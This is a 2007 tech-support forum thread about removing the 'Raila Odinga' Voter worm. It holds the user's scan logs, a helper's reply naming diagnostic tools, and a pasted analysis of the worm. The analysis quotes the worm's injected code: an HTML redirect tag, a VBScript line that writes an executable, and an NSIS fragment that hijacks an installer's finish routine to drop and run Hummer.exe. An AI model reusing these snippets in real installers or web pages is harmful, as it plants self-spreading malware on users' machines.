Raila Virus alias Trojaj.NSIS.Voter.a

Kile · 2007/09/29

Hello,
I have been infected by Raila Odinga Virus or Voterai.a Virus, i have tried to use AVG, Mcaffee but the virus is neither dectected nor removed. I installed HijackThis and SmitFraudFix:

This are the results of HijackThis and SmitFraudFix:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:32:56 PM, on 9/29/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\lvhidsvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\wdfmgr.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\avpo.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\scan0002.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\NOTEPAD.EXE
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\spoolsv.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.microsoft.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: PCTools Site Guard - {5C8B2A36-3DB1-42A4-A3CB-D426709BBFEB} - C:\PROGRA~1\SPYWAR~2\tools\iesdsg.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: PCTools Browser Monitor - {B56A7D7D-6927-48C8-A975-17DF180C71AC} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: McAfee VirusScan - {BA52B914-B692-46c4-B683-905236F6F655} - c:\progra~1\mcafee.com\vso\mcvsshl.dll
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe "
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
O4 - HKLM\..\Run: [BOC-425] C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
O4 - HKLM\..\Run: [VirusScan Online] C:\Program Files\McAfee.com\VSO\mcvsshld.exe
O4 - HKLM\..\Run: [OASClnt] C:\Program Files\McAfee.com\VSO\oasclnt.exe
O4 - HKLM\..\Run: [MCAgentExe] c:\PROGRA~1\mcafee.com\agent\mcagent.exe
O4 - HKLM\..\Run: [MCUpdateExe] C:\PROGRA~1\mcafee.com\agent\mcupdate.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\RunServices: [LvHidSvc] C:\WINDOWS\system32\lvhidsvc.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe "
O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
O4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O4 - Startup: 2007-09 (Sep).lnk = ?
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: ldupver.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Startup: scan0002.lnk = ?
O4 - Global Startup: TVR Schedule.lnk = ?
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Spyware Doctor - {2D663D1A-8670-49D9-A1A5-4C56B4E14E84} - C:\PROGRA~1\SPYWAR~2\tools\iesdpb.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: BOCore - COMODO - C:\Program Files\Comodo\CBOClean\BOCORE.exe
O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Lifeview HID Remote Controller Service (lvhidsvc) - Animation Technologies Inc. - C:\WINDOWS\system32\lvhidsvc.exe
O23 - Service: McAfee WSC Integration (McDetect.exe) - McAfee, Inc - c:\program files\mcafee.com\agent\mcdetect.exe
O23 - Service: McAfee.com McShield (McShield) - McAfee Inc. - c:\PROGRA~1\mcafee.com\vso\mcshield.exe
O23 - Service: McAfee Task Scheduler (McTskshd.exe) - McAfee, Inc - c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
O23 - Service: McAfee SecurityCenter Update Manager (mcupdmgr.exe) - McAfee, Inc - C:\PROGRA~1\McAfee.com\Agent\mcupdmgr.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: PC Tools Spyware Doctor (SDhelper) - PC Tools Research Pty Ltd - C:\Program Files\Spyware Doctor\sdhelp.exe

--
End of file - 9149 bytes

SmitFraudFix v2.227

Scan done at 12:37:10.87, Sat 09/29/2007
Run from C:\Documents and Settings\Clement\Desktop\SmitfraudFix
OS: Microsoft Windows XP [Version 5.1.2600] - Windows_NT
The filesystem type is NTFS
Fix run in normal mode

»»»»»»»»»»»»»»»»»»»»»»»» Process

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\lvhidsvc.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\wdfmgr.exe
c:\program files\mcafee.com\vso\mcvsshld.exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
c:\program files\mcafee.com\agent\mcagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\avpo.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\drivers\2007-09 (Sep).exe
C:\WINDOWS\system32\drivers\autorun.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE (KINYEREZI.exe
C:\WINDOWS\system32\drivers\K'S TAX INVOICE.exe
C:\WINDOWS\system32\drivers\scan.exe
C:\WINDOWS\system32\drivers\scan0002.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

»»»»»»»»»»»»»»»»»»»»»»»» hosts

»»»»»»»»»»»»»»»»»»»»»»»» C:\

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web

»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32

»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement

»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\Clement\Application Data

»»»»»»»»»»»»»»»»»»»»»»»» Start Menu

»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\Clement\FAVORI~1

»»»»»»»»»»»»»»»»»»»»»»»» Desktop

»»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files

»»»»»»»»»»»»»»»»»»»»»»»» Corrupted keys

»»»»»»»»»»»»»»»»»»»»»»»» Desktop Components

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0]
"Source "= "About:Home "
"SubscribedURL "= "About:Home "
"FriendlyName "= "My Current Home Page "

»»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
!!!Attention, following keys are not inevitably infected!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

»»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs "=" "

»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, following keys are not inevitably infected!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System "=" "

»»»»»»»»»»»»»»»»»»»»»»»» Rustock

»»»»»»»»»»»»»»»»»»»»»»»» DNS

»»»»»»»»»»»»»»»»»»»»»»»» Scanning for wininet.dll infection

»»»»»»»»»»»»»»»»»»»»»»»» End

What i found is the Following suspicious files:

4 - Startup: 2007-09 (Sep).lnk = ?
O4 - Startup: autorun.lnk = ?
O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
O4 - Startup: K'S TAX INVOICE.lnk = ?
O4 - Startup: ldupver.lnk = ?
O4 - Startup: scan.lnk = ?
O4 - Startup: scan0002.lnk = ?

Whenever you try to click on one of the files it will bring a popup Ad "Vote for Raila Odinga" in any photo editor or when you log in all the above files opens up as Popup Ads and keeps on doing so after every few minutes.

What are the procedures of getting rid of the infection or what removal tools should i use remove and protect my computer against the infection.

Thanks,

Kile.

NB: Please read the following information i got from the internet about the infection:

Raila Virus
Aliases TROJ_VOTERAI.A (Trend Micro), Trojan.NSIS.Voter.a (Kaspersky) , Worm/Generic.BQP (Grisoft)

The uniqueness of the virus is that it seems to urge computer users to vote for a particular presidential candidate and thus subsequently pops up at randomized intervals.

In the month of june alone, several different versions of the same virus dubbed Voterai by MCafee AV firm and aliases such as W32/Voter-B was identified and added to the respective firms AV databases. The virus has been cartegorized as low risk (lacks mass mailing capabilities ) but rather seems to spread through removable drives and network shares.

It is estimated to have infected well over 150, 000 desktop computers by the end of june in Kenya alone and still remains the most common virus problem experienced in the country at the moment. The virus group that is responsible for the virus are calling themselves "Hackers for the Raila Odinga Campaign 2007 ". Its association with the campaign office has not yet been determined as our efforts to get a statement on the issue have been unsuccessful.

Given that several variants of the same virus seem to be released daily, its impact has been felt locally, especially by Cybercafe operators who seem to be incubating the virus and also the AV firms are less concerned (only reacted after a copy made its way overseas apparently from a student from JKUAT who had gone abroad and unknowingly carried it on his flash drive. The sample was later submitted to Sophos who classified it as a worm (Worm/voter.B (sophos)). We have yet to establish where McFee the first AV firm to detect the variant got their sample) and seem to be reacting too slowly to the threat. Most of the updates are already useless as new variants of the virus seem to evade detection and use new infection techniques undetectable heuristically.

The initial assessment of the virus which claimed it to be a Trojan was since wrong as Kaspersky reclassified the first variants of the virus to Win32.autorun.XXX series after they realized it could spread through removable drives. The newer variants are more harder to detect as they hardly popup, instead infect html files by appending the code "<META http-equiv='refresh' content='1;URL=http://www.raila2007.com'>" at the end of web documents (.htm, .html) which automatically redirects the page to the site above after 1 second. Other variants append the following code enclosed within a script tag (trimmed for security reasons) "<Set filesrc = fso.createtextfile(\ "c:\\hummer.exe\ ",true)" and is meant to copy the virus to the drive and execute (a method of spreading the virus).

Only Grisofts AVG seemed to detect the virus embedded within the document as a VBS worm. Other AVs including Kaspersky and Norton couldn't find anything. An additional blank function tag "dummy()" which is repeatedly called in between statements seems to be what makes the virus undetectable. However Kaspersky heuristics seem to catche the virus when it attempts to execute and flags it as a hidden install (of course a user will think its a fasle alarm and probaly allow it to execute).

Weve also received reports that a new variant may be infecting zipped files. Although we are yet to confirm this, it is possible to unpack files, infect them and repack them again. But we think that it is highly unlikely as zip functions would increase the file size of the virus upto 3 times making it too bulky to spread and also the zipping processes would be too slow and thats why most viruses omit this feature. Same reports also indicate that it has mass mailing capabilities (sends itself through outlook) but this is highly unlikely as outlook doesnt allow certain file extensions to be sent especially file executables unless the virus zips itself before the operation.

To be exact heres the AV firms breakdown:

Trend Micro Systems...

W32/Voter-B spreads by copying itself to removable storage devices.
When first run W32/Voter-B copies itself to:
<System>\drivers\<random name>.exe and creates the following file:
<Desktop>\Raila Odinga.gif - clean may be safely deleted.
W32/Voter-B displays the above mentioned file.
When W32/Voter-B spreads, it copies itself as well as the following files:
-- autorun.inf (clean)
-- autorun.exe (copy of W32/Voter-B)
-- Ralia Odinga.exe (copy of W32/Voter-B)
-- Ralia Odinga.gif (clean)
-- smss.exe (copy of W32/Voter-B)
W32/Voter-B creates the following registry entry to start itself automatically:
-- HKCU\Software\Microsoft\Windows\CurrentVersion\Run<original filename>.exe <System>\drivers\<original filename>.exe

McAfee Antivirus...

Overview

Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes.
Aliases
* DR/NSIS.Voter.A (H+Bedv)
* TROJ_VOTERAI.A (Trend)
* Trojan.NSIS.Voter.a (Kaspersky)
* Worm/Generic.BQP (Grisoft)

Characteristics

Detection was added to cover for a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes. The file is a nullsoft installer file. Upon running, it drops and displays a picture file of "Raila Odinga ", this is just an attention drawer.

Apart from copying itself to the system Raila Odinga.gif is also placed on the desktop and repeatedly opened. In the meantime, the Raila Odinga.exe binary file is being copied silently copied to the windows directory and creates a registry entry to it:

* c:\WINDOWS\system32\drivers\Raila Odinga.exe
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "(Default) "
Data: C:\WINDOWS\system32\drivers\Raila Odinga

It drops an innocent file called "system.dll" having a filesize of 10240 bytes.

* c:\Documents and Settings\userxyz\Local Settings\Temp\nsf5.tmp\System.dll
* c:\Documents and Settings\userxyz\Local Settings\Temp\nsv3.tmp\System.dll

A link file is added as:
* c:\Documents and Settings\userxyz\Start Menu\Programs\Startup\Raila Odinga.lnk

Symptoms

* Presence of a malicious 32 bit PE file originally called "Raila Odinga.exe" , having a filesize of 97.579 bytes
* Picture file "Raila Odinga.gif" being placed on the desktop and repeatedly opened automatically in photo editors

Advanced analysis

Based of the 2 AV firms breakdown, there seems to be a difference in how the virus is being detected. McAfee the first firm to detect the virus classifies it as a trojan while Trend Micro seem to think it is a worm that spreads across removable drives. The differences may occur as they may have obtained different samples of the same virus from various sources. So who's correct..Apparently both.

The virus seems to have been compiled using a number of different icons most commonly the MS Word icon and the JPEG icon which make it difficult for users to differentiate between the virus and legitimate programs. The virus also seems to copy itself to removable drives and adds an autorun file to the drive to ensure automatic execution when the infected drive is accessed.

So why so many different yet undetectable copies of the same virus with different icons. Simple possibilities may be:

---The virus writer collects a number of icons say a 100 and rewrites his code say a hundred times and tests all the samples to make sure they are not detected by any of the av available. Of course this is so impractical and time consuming. Cant work. So we go to option two:

---The virus may be carrying its source code along with it and once it finds a suitable system with a compiler it proceeds to collect icons from the host system and recompiles itself at the same time changing aspects of its code or downloading the latest code from the internet. Seems practical enough as some viruses are known to do the same thing. But then requires too much skillz which the virus writer may not have.

---The most likely way that the virus infects source code from other users systems. They proceed to compile the code unknowingly and distribute it. This is difficult to detect as these programs may be flagged by AV software as malicious yet the user knows that he acquired the program from a reliable source.

We have since received an infected source file which we examined and the results are as follows:

The file confirms option 3 whereby the virus infects source files. Apparently it infects one file (we think). The virus seems to infect a .nsh file extension that belongs to the Nullsoft Installer also the language that the virus is coded in. It appends the following lines:

!include "C:\Program Files\NSIS\Contrib\Modern UI\System.nsh" --- normal header declaration
---------------------added by the virus-----------------------------
!define REDIRECT_ME "redirect "
!ifdef REDIRECT_ME
Function .onGUIEnd
SetOutPath "c:\ "
File "$WHEREIS\$filename "
ExecShell "open" "c:\Hummer.exe "
FunctionEnd
!endif

The code above hijacks the function .onGUIEnd which usually executes after an installer completes. Basically during compilation the code above includes the virus file into the installer which when the installation of the particular program completes the function copies the virus file to c:\Hummer.exe and executes it --- infecting your system. We are still yet to determine how effective this technique is or how many installers may be infected. But given that the Nullsoft Install System is largely used by non-microsoft programmers (Microsoft has own installer uses MSI technology) who are really few and most of whom are very likely to notice the change in the file, its highly unlikely that this technique poses a major threat.

noahdfear · 2007/09/29

Hi Kile,

You've got several active infections. Lets use another tool to get a better look at things.

Note: You must be logged onto an account with administrator privileges to complete the following.

Download Deckard's System Scanner (dss.exe) to your desktop.

Close all applications and windows.

Double click on dss.exe to run it and follow the prompts.

When the scan is complete, two text files will open; main.txt, which will be maximized and extra.txt, which will be minimized.

Post the contents of main.txt only for now.

I would also like for you to do an online scan. Please go HERE to run Panda's ActiveScan

Once you are on the Panda site click the Scan your PC now button

A new window will open...click the Check Now button

Enter your Country

Enter your State/Province

Enter your e-mail address and click send

Select either Home User or Company

Select the appropriate Yes or No to receiving marketing information

Click the Free Online Scan button

If it wants to install an ActiveX component allow it

It will start downloading the files it requires for the scan (Note: It may take a couple of minutes)

When download is complete, click on My Computer to start the scan

When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location.

Post the contents of the ActiveScan report.

Kile · 2007/09/30

How to remove Trojan.NSIS.Voter.a

Deckard's System Scanner v20070905.67
Run by Clement on 2007-09-30 08:51:11
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- System Restore --------------------------------------------------------------

Successfully created a Deckard's System Scanner Restore Point.

-- Last 2 Restore Point(s) --
2: 2007-09-30 05:51:28 UTC - RP2 - Deckard's System Scanner Restore Point
1: 2007-09-29 12:34:40 UTC - RP1 - System Checkpoint

Backed up registry hives.
Performed disk cleanup.

Total Physical Memory: 247 MiB (512 MiB recommended).

-- HijackThis (run as Clement.exe) ---------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:52:57 AM, on 9/30/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Comodo\CBOClean\BOCORE.exe
C:\Program Files\Comodo\Firewall\cmdagent.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINDOWS\system32\lvhidsvc.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\Explorer.EXE
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe
C:\Program Files\Winamp\winampa.exe
C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\TVR\TVR\RecSche.EXE
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Clement\Desktop\dss.exe
C:\PROGRA~1\TRENDM~1\HIJACK~1\Clement.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.microsoft.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe "
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [BOC-425] C:\PROGRA~1\Comodo\CBOClean\BOC425.exe
O4 - HKLM\..\RunServices: [LvHidSvc] C:\WINDOWS\system32\lvhidsvc.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe "
O4 - HKCU\..\Run: [avpa] C:\WINDOWS\system32\avpo.exe
O4 - HKCU\..\Run: [] C:\WINDOWS\system32\drivers\scan
O4 - Startup: scan.lnk = ?
O4 - Global Startup: TVR Schedule.lnk = ?
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
